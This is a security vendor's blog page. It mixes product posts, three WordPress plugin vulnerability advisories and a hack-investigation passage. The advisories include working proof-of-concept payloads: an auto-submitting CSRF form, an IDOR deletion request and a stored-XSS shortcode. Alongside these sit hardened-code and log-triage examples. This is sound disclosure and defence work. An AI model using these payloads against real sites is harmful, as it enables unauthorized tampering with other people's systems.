Category: Uncategorized

  • MailChimp Spam: Fixing the “emails going to spam” issue

    MailChimp users often find that emails from their newsletters end up in spam. The emails themselves, the headers and the text are fine, but for some reason the emails still land in the spam folder. Let’s try to figure out what the reason might be.

    Why email from MailChimp goes to spam

    • Exclamation points or certain phrases in the subject line
      E.g. “Make money”, “F r e e”, “Not spam” and many others. Try to avoid using triggering phrases like these ones.

    • The Unsubscribe button is missing
      Always remember that if the email is not relevant to the recipient and there is no Unsubscribe button, the only way for the recipient to stop getting the email is to mark it as spam.

    • Irrelevant offer
      In case several people mark your email as spam, other emails can end up in the spam folder as well.

    • Blacklisted or unreal email in your email list
      Having blacklisted and non-existent emails in your email list can be recognized by spam filters and put your emails at risk of going into the spam folder. In the instructions below, we will tell you how to clean your mailing list of “bad” addresses.

    How to keep MailChimp from going to spam

    1. Go to SpamBots Check page, copy and paste the email list into the left field or you may upload the file using the Browse button on the right, and press the Submit button. You will need to register in order to check more than 5 emails, which takes about 30 seconds.

    2. After that, you will see a list of checked emails with their results. Feel free to download CSV and JSON files or share a link to that check using the links on the upper right.

    • URL to results – share the check results or reset to the full list, including both good and bad lists.
    • Good list – remove emails that are suspiciously active or invalid.
    • Bad list – leave only the emails that are suspiciously active or invalid.
    • Copy – copy the entire list of emails.
    • CSV – download the results of the check as a CSV file.
    • JSON – download the results of the check as a JSON file.

    3. Open the CSV or JSON file and copy only the emails that are not blacklisted.

    4. Go to your MailChimp newsletter, paste the list in there, and press the Continue to organize button.

    5. After that, continue creating your MailChimp newsletter as usual.

    Using only verified emails will help you avoid MailChimp going to spam and get more of your newsletter emails delivered and opened. And don’t forget to verify all your email lists to reduce the chances of your emails ending up in spam. Email verification helps clean your email lists, which increases email deliverability and engagement rates.

  • Advanced Bot Protection Solutions for Safeguarding Your Website

    In Internet activity, up to 37.9% of global traffic is generated by bots, including both “good” and “bad” bots. Bots are automated software applications that interact with websites and databases. These bots can be divided into two main groups: good bots and bad bots.

    Good bots, often known as web crawlers or spiders, play a vital role in indexing and archiving web content for search engines like Google, Bing and Yahoo. They help make information on the Internet more accessible and searchable, contributing to the overall functionality of the Internet. For example, Googlebot, a search bot used by Google, systematically crawls web pages to update its index and provide users with relevant and up-to-date search results. These good bots are essential to ensure visibility and accessibility of online content.

    Bad bots, on the other hand, engage in a wide range of harmful activities that put websites and their visitors at risk. Some bad bots specialize in constantly sending unwanted spam to websites, flooding inboxes and causing significant inconvenience to users. Others focus on identifying and exploiting website security vulnerabilities that pose a significant threat to the integrity and reliability of online platforms. In addition, malicious bots with the ability to scrape websites without authorization collect sensitive information from websites, including contact information and personal data, which can then be used for illegal purposes. Alarming statistics show that malicious bot activity accounts for a significant portion of overall internet traffic, reflecting the sheer volume and pervasive nature of their impact.

    The impact of malicious bots can be far-reaching and severe, having a detrimental impact on a website’s performance, security, and usability. These bots consume valuable server resources, slow down websites, and disrupt regular operations, resulting in reduced responsiveness and functionality. Additionally, infiltration by malicious bots can lead to security breaches, data leaks, and reputational damage to affected websites. The consequences of such unauthorized actions can significantly impact the efficiency and reliability of online platforms, leading to a decrease in user trust and engagement.

    To effectively combat the dangers posed by malicious bots, website owners and administrators need reliable and robust bot protection solutions. Such solutions must be able to thoroughly detect and prevent malicious activities orchestrated by malicious bots, ensuring the security and integrity of websites and their data. Cleantalk Anti-spam for WordPress is a comprehensive option for protecting websites from both spam and malicious bot activity. At the heart of this solution is the Anti-Crawler option, an advanced feature specifically designed to analyze incoming traffic and effectively detect and prevent malicious bot activity.

    The Anti-Crawler option in Cleantalk Anti-spam works as “bot protection” and performs a scan when opening any page on the site. If the verification fails when you first open the page, the plugin enters the IP address into the database and limits access to the site for a time, thereby mitigating the potential impact of malicious bot actions. By using this proactive security mechanism, website owners can confidently protect their online projects, maintain the security and operational integrity of their websites, and provide a safe and secure browsing experience for their visitors.

    In conclusion, the threat posed by malicious bots is a major concern for website owners. By developing a comprehensive understanding of the different types of bots and the risks they pose, and implementing robust bot protection such as Cleantalk Anti-Spam with the Anti-Crawler option, website owners can strengthen their online assets and provide a safe browsing experience for their visitors. This proactive approach allows website owners to mitigate the potential risks posed by malicious bots and maintain the trust and security required for their online presence.

  • CVE-2023-4209 – POEditor < 0.9.8 - Settings Reset via CSRF

    In our quest for a secure WordPress environment, a significant discovery has emerged. The POEditor plugin, a powerful translation tool, harbors a critical vulnerability. Prior to version 0.9.8, the absence of Cross-Site Request Forgery (CSRF) protection has exposed the plugin to potential manipulation by attackers.

    Main info:

    CVE: CVE-2023-4209
    Plugin: POEditor
    Criticality: Medium
    Publicly Published: August 7, 2023
    Last Updated: August 7, 2023
    Researcher: Dmitrii Ignatyev
    OWASP TOP-10: A2: Broken Authentication and Session Management
    PoC: Yes
    Exploit: Will be later
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4209
    https://wpscan.com/vulnerability/b2c6fa7d-1b0f-444b-8ca5-8c1c06cea1d9
    Plugin Security Certification by CleanTalk

    Timeline

    July 14, 2023: Plugin testing and vulnerability detection in the POEditor plugin have been completed
    July 14, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    August 3, 2023: The author has released a fix update
    August 7, 2023: Registered CVE-2023-4209

    Discovery of the Vulnerability

    During a comprehensive assessment of the POEditor plugin for WordPress, a medium vulnerability was uncovered. Versions prior to 0.9.8 lack Cross-Site Request Forgery (CSRF) checks in various critical areas. This oversight could potentially enable attackers to exploit logged-in administrator accounts, leading to unwanted actions, including the resetting of the plugin’s settings and unauthorized updates to its API key through CSRF attacks.

    Understanding CSRF (Cross-Site Request Forgery) attacks

    Cross-Site Request Forgery (CSRF) is a type of attack where an attacker tricks a user into performing actions they didn’t intend to, often in the context of an authenticated session. In the case of the POEditor plugin, the absence of CSRF checks exposes administrators to potential manipulation by malicious actors who can initiate actions without their knowledge.

    Exploiting the CSRF (Cross-Site Request Forgery) vulnerability

    By exploiting the lack of CSRF protection, attackers can create scenarios where logged-in administrators unwittingly trigger actions on the POEditor plugin. Through carefully crafted links or malicious code on websites, attackers can remotely reset the plugin’s settings and alter its API key, ultimately compromising the plugin’s functionality.

    POC HTML code:

    <html>
      <body>
        <script>history.pushState('', '', '/')</script>
        <form action="http://your_host/wordpress/wp-admin/tools.php">
          <input type="hidden" name="page" value="poeditor" />
          <input type="hidden" name="do" value="clean" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>

    Potential Risks and Real-World Impact

    The CSRF vulnerability in the POEditor plugin presents several potential risks and scenarios:

    1. Plugin Functionality Disruption:
      Attackers can render the plugin non-functional by resetting its settings and invalidating its API key, causing site administrators to lose valuable translation management capabilities.
    2. Unauthorized Data Access:
      Malicious actors could exploit CSRF attacks to gain unauthorized access to sensitive translation-related data, potentially exposing private information.
    3. Manipulation of Plugin Behavior:
      Attackers might tamper with the plugin’s settings or configuration, leading to erratic behavior or undermining the intended functionality of the plugin.

    Recommendations for Improved Security

    To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

    • Update the Plugin:
      Promptly update the POEditor plugin to version 0.9.8 or higher, ensuring that the vulnerability is patched.
    • Implement CSRF Protection:
      Developers should incorporate robust CSRF protection mechanisms, such as nonces or token-based authentication, to prevent unauthorized actions.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Awareness:
      Educate administrators about the risks of clicking on unknown links or visiting suspicious websites, emphasizing the importance of vigilance.
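The nonce-based protection recommended above, shown as an added example rather than POEditor's own code: a hypothetical settings-reset handler in the vulnerable shape (any `?page=poeditor&do=clean` request is honoured, which is exactly what the PoC form triggers) beside a hardened one that requires POST, a WordPress nonce bound to the action and the logged-in user, and a capability check. All function and option names prefixed `hypothetical_`/`HYPO_` are invented for the example; the WordPress runtime (`check_admin_referer`, `wp_nonce_field`, `current_user_can`, …) is assumed.

```php
<?php
// Added example (not POEditor's code). Assumes it runs inside WordPress.

// --- Vulnerable shape: a state change driven by query parameters alone.
// A form on an attacker-controlled page can make an administrator's browser
// send this request with the admin's cookies, and nothing ties it to the admin's intent.
function hypothetical_poeditor_clean_vulnerable() {
    if ( isset( $_GET['page'], $_GET['do'] ) && 'poeditor' === $_GET['page'] && 'clean' === $_GET['do'] ) {
        delete_option( 'hypothetical_poeditor_api_key' );
        delete_option( 'hypothetical_poeditor_settings' );
    }
}

// --- Hardened shape: the reset form carries a nonce minted for this action,
// and the handler accepts the action only over POST, with a valid nonce, from a user
// who may manage options.
const HYPO_POEDITOR_CLEAN_ACTION = 'hypothetical_poeditor_clean';

function hypothetical_poeditor_render_clean_form() {
    $url = admin_url( 'tools.php?page=poeditor' );
    echo '<form method="post" action="' . esc_url( $url ) . '">';
    // Emits the _wpnonce and _wp_http_referer hidden fields for this action.
    wp_nonce_field( HYPO_POEDITOR_CLEAN_ACTION );
    echo '<input type="hidden" name="do" value="clean" />';
    submit_button( 'Reset settings', 'delete' );
    echo '</form>';
}

function hypothetical_poeditor_clean_hardened() {
    if ( ! isset( $_GET['page'] ) || 'poeditor' !== $_GET['page'] ) {
        return;
    }
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['do'] ) || 'clean' !== $_POST['do'] ) {
        return; // A GET (link, image, auto-submitted GET form) never resets anything.
    }
    // Stops with wp_die() unless _wpnonce was generated for this action, for this
    // user, within the nonce lifetime. A cross-site form cannot obtain that value.
    check_admin_referer( HYPO_POEDITOR_CLEAN_ACTION );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    delete_option( 'hypothetical_poeditor_api_key' );
    delete_option( 'hypothetical_poeditor_settings' );
    // Redirect after the state change so a reload does not repeat it.
    wp_safe_redirect( admin_url( 'tools.php?page=poeditor&reset=1' ) );
    exit;
}
add_action( 'admin_init', 'hypothetical_poeditor_clean_hardened' );
```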

    By addressing the CSRF vulnerability in the POEditor plugin and adhering to these security recommendations, website owners can fortify their translation management system, prevent unauthorized actions, and maintain a secure and functional WordPress environment.

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.



  • CVE-2023-4023 – All Users Messenger <= 1.24 - Subscriber + Message Deletion via IDOR

    In a recent round of intensive plugin testing, a concerning security flaw has come to light. The All Users Messenger plugin, a widely used communication tool for WordPress, harbors a significant Insecure Direct Object Reference (IDOR) vulnerability.

    Main info:

    CVE: CVE-2023-4023
    Plugin: All Users Messenger
    Criticality: Medium
    Publicly Published: August 7, 2023
    Last Updated: August 7, 2023
    Researcher: Dmitrii Ignatyev
    OWASP TOP-10: A5: Broken Access Control
    PoC: Yes
    Exploit: Will be later
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4023
    https://wpscan.com/vulnerability/682c0226-28bd-4051-830d-8b679626213d
    Plugin Security Certification by CleanTalk

    Timeline

    July 25, 2023: Plugin testing and vulnerability detection in the Simple Blog Card plugin have been completed
    July 25, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    July 26, 2023: The author closed his plugin and did not fix the vulnerability
    August 7, 2023: Registered CVE-2023-4023

    Discovery of the Vulnerability

    During a meticulous examination of the All Users Messenger plugin for WordPress, a vulnerability was unearthed, specifically affecting versions up to 1.24. The vulnerability involves a significant oversight that permits non-administrator users to delete messages from the all-users messenger, potentially leading to unauthorized data manipulation.

    Understanding of IDOR (Insecure Direct Object Reference)

    Insecure Direct Object Reference (IDOR) is a security vulnerability that arises when an application does not sufficiently verify user access rights before allowing access to certain resources or functionalities. In the case of the All Users Messenger plugin, the absence of proper access checks enables unauthorized users to delete messages that they should not have permission to manipulate.

    Exploiting the IDOR (Insecure Direct Object Reference) vulnerability

    By leveraging the lack of adequate access control, a non-administrator user with subscriber-level privileges can manipulate the plugin’s message deletion functionality to remove messages that belong to other users. This can potentially disrupt communication, lead to data loss, and compromise the integrity of the messaging system.

    POC request:

    POST /wordpress/index.php?rest_route=%2Frf%2Fall_users_messenger_view_api%2Ftoken&_locale=user HTTP/1.1
    Host: your_host
    User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, */*;q=0.1
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://your_host/wordpress/wp-admin/admin.php?page=AllUsersMessenger
    X-WP-Nonce: 5e42638171
    Content-Type: application/json
    Origin: http://your_host
    Content-Length: 81
    Connection: close
    Cookie: cookie of low privilege user
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin

    {"userid":1,"delete":{"1690260984":true,"1691465801":true},"submit_delete":true}

    The request is sent with the session cookie of a subscriber-level user, yet the body names another user (userid 1) and the ids of the messages to delete; because the plugin never checks who owns those messages, the deletion goes through.

    Potential Risks and Real-World Impact

    A subscriber-level user is able to exploit this vulnerability by tampering with message deletion requests, allowing them to delete messages from the all-users messenger that they should not have the authority to modify.

    1. Unauthorized Data Manipulation:
      Attackers could maliciously delete important messages, leading to information loss and potential disruption of communication among users.
    2. Privacy Breach:
      Sensitive or private messages could be deleted by unauthorized users, potentially violating user privacy and confidentiality.
    3. Content Tampering:
      By exploiting the vulnerability, attackers might alter or delete critical messages, affecting the authenticity and reliability of communication.

    Recommendations for Improved Security

    To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

    • Immediate Plugin Removal:
      Website administrators should delete the All Users Messenger plugin, since the author closed it without fixing the vulnerability.
    • Access Control Validation:
      Developers should conduct rigorous access control checks to ensure that users have the appropriate authorization before allowing them to modify or delete messages.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Privilege Restriction:
      Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
    • Least Privilege Principle:
      Implement the principle of least privilege, granting users only the permissions necessary for their intended tasks.
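The access-control check the recommendations above call for, as an added example and not the plugin's own code: a hypothetical REST route for deleting messages in the IDOR shape (the owner comes from the request body, just as `userid` does in the PoC) beside a hardened one, where the owner is taken from the authenticated session and every message id is checked against it. The route name, the option-backed message store and all `hypo_` names are invented for the example; the WordPress REST API (`register_rest_route`, `WP_REST_Request`, `WP_Error`) is assumed.

```php
<?php
// Added example (not All Users Messenger's code). Assumes it runs inside WordPress.

// Constructed stand-in for the plugin's storage: messages keyed by a timestamp id,
// each recording the user id that owns it.
function hypo_messenger_load() {
    return get_option( 'hypo_messenger_messages', array() );
}
function hypo_messenger_save( array $messages ) {
    update_option( 'hypo_messenger_messages', $messages );
}

// --- IDOR shape: any logged-in caller may name any message id (and any "userid");
// nothing compares the id's owner with the caller, so a subscriber can delete
// everyone's messages.
function hypo_messenger_delete_vulnerable( WP_REST_Request $req ) {
    $messages = hypo_messenger_load();
    foreach ( (array) $req['delete'] as $id => $flag ) {
        unset( $messages[ $id ] ); // no ownership check at all
    }
    hypo_messenger_save( $messages );
    return rest_ensure_response( array( 'deleted' => true ) );
}

// --- Hardened shape: the identity is the session's, never a body field, and each
// object is authorized individually. Administrators keep their moderation rights.
function hypo_messenger_delete_hardened( WP_REST_Request $req ) {
    $uid      = get_current_user_id();
    $is_admin = current_user_can( 'manage_options' );
    $messages = hypo_messenger_load();
    $deleted  = array();
    foreach ( (array) $req['delete'] as $id => $flag ) {
        if ( ! $flag || ! isset( $messages[ $id ] ) ) {
            continue;
        }
        if ( (int) $messages[ $id ]['owner'] !== $uid && ! $is_admin ) {
            // Refuse the whole request rather than silently skipping, so the
            // attempt shows up as a 403 in the logs.
            return new WP_Error( 'rest_forbidden', 'Not your message', array( 'status' => 403 ) );
        }
        unset( $messages[ $id ] );
        $deleted[] = $id;
    }
    hypo_messenger_save( $messages );
    return rest_ensure_response( array( 'deleted' => $deleted ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'hypo-messenger/v1', '/messages/delete', array(
        'methods'             => 'POST',
        'callback'            => 'hypo_messenger_delete_hardened',
        // permission_callback answers "is this caller authenticated?";
        // per-object authorization still has to happen in the callback.
        'permission_callback' => function () {
            return is_user_logged_in();
        },
        'args'                => array(
            'delete' => array( 'required' => true, 'type' => 'object' ),
        ),
    ) );
} );
```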

    By addressing the IDOR vulnerability in the All Users Messenger plugin and adopting these security recommendations, website owners can fortify their messaging systems, preserve data integrity, and create a safer environment for communication among users.


    Dmitrii i.


  • CVE-2023-4035 – Simple Blog Card < 1.31 - Contributor+ Stored XSS via Shortcode

    In our recent in-depth security analysis of the widely used Simple Blog Card plugin for WordPress, a concerning vulnerability has come to light. Versions prior to 1.31 have a critical flaw, leaving your website exposed to potential Stored Cross-Site Scripting (XSS) attacks!

    Main info:

    CVE: CVE-2023-4035
    Plugin: Simple Blog Card
    Criticality: High
    Publicly Published: August 2, 2023
    Last Updated: August 2, 2023
    Researcher: Dmitrii Ignatyev
    OWASP TOP-10: A7: Cross-Site Scripting (XSS)
    PoC: Yes
    Exploit: Will be later
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4035
    https://wpscan.com/vulnerability/8fd9192a-2d08-4127-adcd-87fb1ea8d6fc
    Plugin Security Certification by CleanTalk

    Timeline

    July 31, 2023: Plugin testing and vulnerability detection in the Simple Blog Card plugin have been completed
    July 31, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    August 1, 2023: The author has eliminated the vulnerability and patched his plugin
    August 2, 2023: Registered CVE-2023-4035

    Discovery of the Vulnerability

    During a comprehensive security assessment of the Simple Blog Card plugin for WordPress, an alarming vulnerability was discovered in versions prior to 1.31. The plugin fails to validate and escape some of its shortcode attributes before rendering them on a page or post. This oversight can potentially enable users with the contributor role and above to execute Stored Cross-Site Scripting (XSS) attacks.

    Understanding Cross-Site Scripting (XSS)

    Cross-Site Scripting (XSS) is a dangerous attack that allows attackers to inject malicious scripts into web pages, affecting other users who visit the compromised page. In this context, attackers can exploit the Simple Blog Card plugin by embedding specially crafted shortcodes on a new page and submitting it for review by an administrator. When the administrator approves the page, the stored XSS attack is executed, and the consequences can be severe.

    Exploiting the Stored Cross-Site Scripting (XSS) vulnerability

    An attacker creates a seemingly harmless blog post containing a Simple Blog Card shortcode with malicious script injections. When an unsuspecting administrator approves the post, the malicious scripts execute within the browser of anyone viewing the page, leading to unauthorized data access, cookie theft, or other harmful actions.

    POC shortcode:

    [simpleblogcard url="http://***.*/" color='red;" onmouseover="alert(111111)"']

    This shortcode can be inserted into a new post

    Potential Risks and Real-World Impact

    The XSS vulnerability in the Simple Blog Card plugin poses serious risks to both website administrators and visitors. Some potential real-world scenarios include:

    1. Unauthorized Data Access:
      Attackers could exploit the XSS vulnerability to steal sensitive user data, such as login credentials or personal information.
    2. Cookie Theft:
      Malicious scripts could hijack user cookies, leading to unauthorized access to user accounts or session hijacking. After an account takeover, the attacker can insert malicious PHP code into a page, which results in RCE.
    3. Malicious Content Distribution:
      Attackers might use the vulnerability to inject harmful content or links into the website, potentially damaging the site’s reputation or spreading malware.

    Recommendations for Improved Security

    To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

    • Immediate Plugin Update:
      Website administrators should update the Simple Blog Card plugin to version 1.31 or higher, which addresses the XSS vulnerability.
    • Input Validation and Escaping:
      Plugin developers must implement robust input validation and escaping mechanisms to ensure that all user-generated content, including shortcodes, is properly sanitized before rendering on the page.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Privilege Restriction:
      Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
    • User Awareness:
      Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.
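The validation and escaping recommended above, as an added example and not Simple Blog Card's code: a hypothetical link-card shortcode in the vulnerable shape (attributes dropped straight into HTML, so the PoC's `color` value closes the `style` attribute and adds an event handler) beside a hardened one that validates each attribute against what it is supposed to be and then escapes it for the exact context it lands in. The shortcode name and all `hypo_` names are invented; the WordPress runtime (`shortcode_atts`, `esc_url`, `esc_attr`, `esc_html`) is assumed.

```php
<?php
// Added example (not Simple Blog Card's code). Assumes it runs inside WordPress.

// --- Vulnerable shape: raw attribute values concatenated into markup.
function hypo_blogcard_vulnerable( $atts ) {
    $a = shortcode_atts( array( 'url' => '', 'color' => 'black' ), $atts );
    return '<a href="' . $a['url'] . '" style="color:' . $a['color'] . '">' . $a['url'] . '</a>';
}

// --- Hardened shape.
// Allowlist for the color: a CSS named color or a 3/6-digit hex value; anything
// else (including a value that tries to close the attribute) falls back to black.
function hypo_blogcard_color( $color ) {
    if ( preg_match( '/^(?:[a-z]{3,20}|#(?:[0-9a-f]{3}|[0-9a-f]{6}))$/i', $color ) ) {
        return $color;
    }
    return 'black';
}

function hypo_blogcard_hardened( $atts ) {
    $a   = shortcode_atts( array( 'url' => '', 'color' => 'black' ), $atts, 'hypo_blogcard' );
    $url = esc_url( $a['url'] ); // rejects javascript: and other disallowed schemes, encodes for href
    if ( '' === $url ) {
        return ''; // no URL, no card
    }
    $color = hypo_blogcard_color( $a['color'] );
    return sprintf(
        '<a href="%s" style="color:%s">%s</a>',
        $url,                  // already escaped for a URL attribute
        esc_attr( $color ),    // attribute context: quotes become &quot;
        esc_html( $a['url'] )  // text context
    );
}
add_shortcode( 'hypo_blogcard', 'hypo_blogcard_hardened' );
```

With the PoC attribute from above, `hypo_blogcard_color()` returns `black` and the `onmouseover` text never reaches the markup, while a plain `color="red"` still renders as intended.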

    By addressing the XSS vulnerability in the Simple Blog Card plugin and adhering to these security recommendations, website owners can protect their systems from malicious attacks, safeguard user data, and preserve the integrity of their websites. Stay safe and secure in the ever-evolving digital landscape!


    Dmitrii i.


  • Importance of Using the CleanTalk Email Checker Service to Validate Email Addresses for Existence

    Email Checker is an important tool that helps to verify the legitimacy of email addresses. It is a software tool that checks the validity of an email address in real time, which ensures that emails are not only sent but also delivered to the intended recipients. Email address validation, on the other hand, is a process of verifying the email address using several methods, such as syntax checks, MX record checks, and email filtering. These checks reduce the likelihood of invalid email addresses being added to your mailing lists, which in turn reduces the number of bounced emails and the potential for spam complaints.

    A very large number of websites use subscription forms for updates, user registrations or order/checkout forms. Website owners use the email addresses of their clients for newsletter mailing lists. The same forms are also often used by spam bots for spam purposes, so if a form is not protected, spam email addresses will be added to the mailing list.

    CleanTalk Anti-Spam Service provides tools for checking email addresses for existence. If you are using any of the CleanTalk Anti-Spam plugins, email address checking is being done automatically and non-existent email addresses will be blocked. How to install the CleanTalk Anti-Spam plugin on a website can be found on our help pages, here are our detailed guides for popular CMS: https://cleantalk.org/help/install 

    CleanTalk also provides access to the Online Email Checker Service: https://cleantalk.org/email-checker . You can go to the verification page and enter the email address you want to check and get the result whether this address exists or not.

    Email communication has become one of the most critical ways of exchanging information in today’s digital world. Whether for business purposes or personal communication, sending emails has become a necessary part of our daily life. However, sending emails to invalid email addresses can be counterproductive. 

    How to reduce the risk of sending emails to fake addresses

    Sending emails to invalid or fake email addresses can be counterproductive. It can lead to a high bounce rate, reducing email engagement, impact sender reputation and even result in email accounts being marked as spam. Email servers may consider emails that were sent to fake email addresses as spam and report it as such. This can lead to the email account being marked as spam, which can have negative consequences for the sender.

    The use of the CleanTalk Email Checker and Email Validation tools can help with reducing the likelihood of these issues and ensure that emails are delivered to the appropriate recipients.

  • What is the CleanTalk Security FireWall

    Security Firewall for WordPress websites is a tool that helps in protecting your website from hacking and other cyber attacks. In today’s world, hackers can attack websites using a variety of tools and methods. The CleanTalk Security Firewall blocks malicious attacks such as SQL injections, malware scripts, and more.

    There are many threats that can hit a website and the CleanTalk Security Firewall is an important and necessary security measure. This tool offers a number of features that keeps your site secure. Here are a few reasons why the CleanTalk Security Firewall is essential for your WordPress site.

    How to install the CleanTalk Security Plugin on your site: https://cleantalk.org/help/install-wordpress-security 

    1. The CleanTalk Database of Dangerous IP Addresses is used to protect against malicious attacks.
      CleanTalk uses its own database of dangerous IP addresses that other sites were attacked from. This database is constantly updated and lists known IP addresses whose activity is associated with unwanted actions such as spam, brute force, hacks and other types of cyber attacks.

      When a user visits a site, CleanTalk automatically checks the user’s IP address against the database for suspicious activity. If the address is found, CleanTalk denies access to the site or blocks any attempt to send inappropriate content to the site.
      Thus, the Database of Dangerous IP Addresses helps prevent attacks and protects websites from unwanted actions, which makes CleanTalk an effective tool for protecting web resources.
    2. The Web Application FireWall is part of the CleanTalk Security FireWall and is designed to block attack attempts such as XSS, MySQL injections and attempts to upload malicious files, and to check traffic for known exploits.
      WordPress is one of the most popular Content Management Systems (CMS), and web application vulnerabilities can be used to hack a site or steal sensitive information such as logins and passwords.
      The Web Application Firewall for WordPress enhances website security and protects your website from potential security threats and data loss.

    3. The Security FireWall Log monitors all activity on the site. The Security FireWall Log shows all visits to the site, and you can see which IP addresses visited which pages, the number of requests made to the site, the geolocation of the IP address and the User Agent used.

      Using this data, you can determine the IP addresses that generate a large number of requests to the site or visit non-existent pages of the site, and then blacklist or whitelist those IP addresses.
      All Security FireWall Logs are stored in your CleanTalk Dashboard and kept for 7 days. You can use various filters to evaluate the activity of IP addresses on the site, get data for the last 7 days and add entries to your Personal Lists.

    All in all, Security Firewall is an essential security measure for your WordPress site. It offers many features that keep your website protected from various types of cyber attacks. It’s a good practice to use the CleanTalk Security Firewall for protecting your data and keeping your site secure.

    You can view information about CleanTalk Security Plugin in the WordPress directory: https://cleantalk.org/help/install-wordpress-security 


  • Our Investigation of the Hack of One Website (OR: How We Investigated a Hack of One Website)

    We were contacted by one WordPress website owner with the issue of a website hack. Consequences of the hack were that their whole website content was deleted, meaning articles, pictures, plugins and themes were gone and visiting the website displayed a blank page. What was left in the folder «wp-content» was a single folder «uploads», new files in the root directory and many custom files «.htaccess» in other folders.

    Before restoring the website, the following measures were taken first. To avoid future successful connections from the hacker, all passwords were changed, including the database ones, HTTP authorization was enabled, and installation of any files and themes was allowed only over FTP.

    What Has Been Done to Find Out the Source of the Hack

    The main task was gathering information about how the hacker managed to get access to the website and delete all of its content.

    The first step was preserving the entire file system in its current state rather than re-creating the files (this matters because the original timestamps are needed to identify the creation time of the malicious files), together with:

    • saving nginx «access.log» on the date of the detected hack
    • saving nginx «error.log» on the date of the detected hack
    • saving nginx «syslog» on the date of the detected hack

    Input data:

    • logs «access.log» (200 MB) «error.log» (47 MB)
    • website files

    A local Splunk instance was chosen for the log analysis; the data sources were the files «access.log» and «error.log».

    To determine when the website infection happened, the creation time of the suspicious files in the website folder was taken as the starting point.

    The next step was selecting the lines from the log files within that time period with server response 200, while excluding requests to «admin_ajax» and «wp_cron».

    Thus, we found the hacker’s IP address that was able to get a response 200 for its POST request to this address: /wp-content/themes/seotheme/db.php?

    Next, we analyzed every line of activity from this IP address within the same time period. This data shows that someone created the folder /wp-content/themes/seotheme.
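    The log triage just described, as an added example in Python rather than the Splunk search used in the write-up: it parses nginx combined-format lines, keeps only requests inside the hack window that got response 200, drops admin-ajax and wp-cron traffic, and reports the source IPs that POSTed to PHP files under /wp-content/. The log lines, IP addresses and time window are constructed placeholders, not data from the incident.

```python
"""Triage an nginx access.log for a hack window, as in the analysis above. Added example,
not the page's Splunk search; log lines, IPs and the window are constructed placeholders."""
import re
from collections import defaultdict
from datetime import datetime

# nginx "combined" format: ip - user [time] "method path proto" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
NOISE = ("/wp-admin/admin-ajax.php", "/wp-cron.php")  # background traffic excluded above

def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    return rec

def suspicious_posts(lines, start, end):
    """{ip: [request paths]} for POSTs answered 200 inside [start, end], skipping
    admin-ajax/wp-cron and keeping only PHP files under /wp-content/ (themes,
    plugins, uploads), where a dropped file like the db.php above would live."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not (start <= rec["time"] <= end):
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string before matching
        if rec["method"] != "POST" or rec["status"] != 200 or path.startswith(NOISE):
            continue
        if path.startswith("/wp-content/") and path.endswith(".php"):
            hits[rec["ip"]].append(rec["path"])
    return dict(hits)

# Constructed sample: an admin-ajax call, one POST to a theme PHP file inside the
# window, and the same request from before the window (should not be reported).
SAMPLE = """\
203.0.113.9 - - [01/Nov/2022:10:00:05 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla"
198.51.100.7 - - [01/Nov/2022:10:01:10 +0000] "POST /wp-content/themes/seotheme/db.php?u HTTP/1.1" 200 80 "-" "curl/7.81"
198.51.100.7 - - [01/Nov/2022:09:00:00 +0000] "POST /wp-content/themes/seotheme/db.php HTTP/1.1" 200 80 "-" "curl/7.81"
"""
WINDOW = tuple(datetime.strptime(t, TIME_FMT)
               for t in ("01/Nov/2022:09:30:00 +0000", "01/Nov/2022:10:30:00 +0000"))
```

Running `suspicious_posts(SAMPLE.splitlines(), *WINDOW)` on the sample returns only the in-window POST, keyed by its source IP.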

    Furthermore:

    • the cybercriminal at IP address 43.153.77.57 received response 200 to their POST request to /wp-content/themes/seotheme/db.php?u, after which a number of malicious files were created and began to be requested;
    • a set of «.htaccess» files was created and modified specifically for an Apache-like web server, to allow executing files;
